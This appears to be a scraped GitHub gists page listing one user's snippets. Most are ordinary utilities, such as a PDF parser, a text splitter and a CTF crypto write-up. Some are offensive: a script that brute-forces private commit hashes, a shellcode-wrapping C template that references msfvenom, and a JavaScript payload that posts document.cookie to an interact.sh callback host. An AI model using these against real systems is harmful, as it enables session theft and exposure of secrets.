sudoaza’s gists

sudoaza / brute_commit.py

Created October 24, 2024 13:00

Bruteforce private commits by their short hash. Based on research from Truffle Sec https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github

	#!/usr/bin/env python3
	"""
	Brute force commit hashes on GitHub projects.
	Example usage:

	brute_commit.py user/repo >> found_commits.txt
	mkdir dump_dir; wget -c -i found_commits.txt -P dump_dir
	trufflehog filesystem dump_dir

	"""

sudoaza / parsepdf.py

Created August 26, 2024 09:27

Quick and dirty parse PDF file and extract objects/images

	import re
	import zlib
	import argparse
	from PIL import Image

	def parse_args():
	parser = argparse.ArgumentParser(description='Decompress data using zlib')
	parser.add_argument('pdf_file', help='The PDF file to analyze')
	return parser.parse_args()

sudoaza / split_text.py

Created January 30, 2024 01:38

Recursive text splitter, because Langchain's one sucks!


	def split_text(text, chunk_size=500, separators=['\n\n', '.\n', ':\n', '\n', '. ', ', ', " ", ""]):
	"""Split text into chunks of size less than chunk_size, using separators."""
	chunks = []
	current_separator_index = 0
	for separator in separators:
	current_separator_index += 1
	if len(text) < chunk_size:
	if len(text) > 0:
	chunks.append(text)

sudoaza / haproxy.cfg

Created December 23, 2023 19:40

Keep openai api key safe while sharing access

sudoaza / decipher.py

Created July 21, 2023 08:30

Substitution cipher analysis

	import math

	from nltk.util import ngrams

	ciphertext = """['\|']][]]}[[/]] [{}]{[]}['\|'], ]]]]])([](_) {[9}])([['\|'] ]]/[[[{}]{[]}['\|'] ][['\|'] ['\|']{[]}]]([]{[[/]] ['\|']])([ [{=][{[9}](_)]][}[]{ ])([](_)['\|'] ['\|'][{}][]{ [}/[}])([[[/]]['\|'] [{}]{[]}]][}[[))[]{[}{][]{[[)) [{][]]}[{}][]{]][}[[/]]. [{[{}][]{[]{]][}[[/]], ]]]]])([](_)]][}[[/]] ]{]0]{]]][}00['\|'] """

	charset = list(set(ciphertext))

	occurrences = {s: ciphertext.count(s) for s in charset}
	print(sorted(occurrences.items(), key=lambda x: -x[1]))

sudoaza / pre-commit

Last active February 14, 2023 13:50 — forked from edisonywh/pre-commit

Run Rubocop in Git's pre-commit hook

	```
	#!/bin/sh
	echo "\nRunning rubocop...\n"

	declare -a ERRORS=()

	ERRORS=("$(rubocop $(git diff --cached --name-only \| tr -s "\n" " ") \| grep -e 'C:' -e 'E:')")

	if [[ "$ERRORS" != "" ]]; then
	echo "\n BEE-BOP! There are some things that you need to fix before commiting!\n"

sudoaza / template_md

Last active December 20, 2022 03:32

Format markdown nicely into pdf with pandoc

sudoaza / hollow.c

Last active April 8, 2023 20:24

Shellcode to binary c

	int main(int argc, char** argv) {
	__asm__ (
	"nop \n\t"
	// );
	// return 0;
	// }
	// python -c 'print(" \"nop \\n\\t\"\n"*2000)' >> hollow.c
	// echo -e " );\n return 0;\n}" >> hollow.c
	// gcc hollow.c -o hollow # gcc hollow.c -m32 -o hollow # i686-w64-mingw32-gcc -o hollow.exe hollow.c # x86_64-w64-mingw32-gcc -o hollow.exe hollow.c
	// msfvenom ... > shellcode.asm

sudoaza / test.js

Last active April 9, 2022 23:25

	var xmlHttp = new XMLHttpRequest();
	xmlHttp.open( "POST", "http://testjs.c990xmp2vtc00006r7r0grwoq4eyyyyyb.interact.sh", false );
	xmlHttp.send( document.cookie );
	alert("Cookie eaten");

sudoaza / badaes.py

Last active December 14, 2024 11:10

RITSEC CTF 2022 - Crypto - Bad AES

	"""
	# RITSEC CTF 2022 - Crypto - Bad AES
	## Custom AES implementation where Mix Columns and Shift Rows steps switch places

	A secret government agency uses a 16-letter passphrase that is encrypted
	to create their passwords for their computers. An insider within the agency
	told me that everyday employees input their passphrase into this secret
	encryption scheme to receive their password for the day & the key used to
	encrypt their passphrase is changed by the agency daily.
	(This is so their passwords change every day without the employee having

aza sudoaza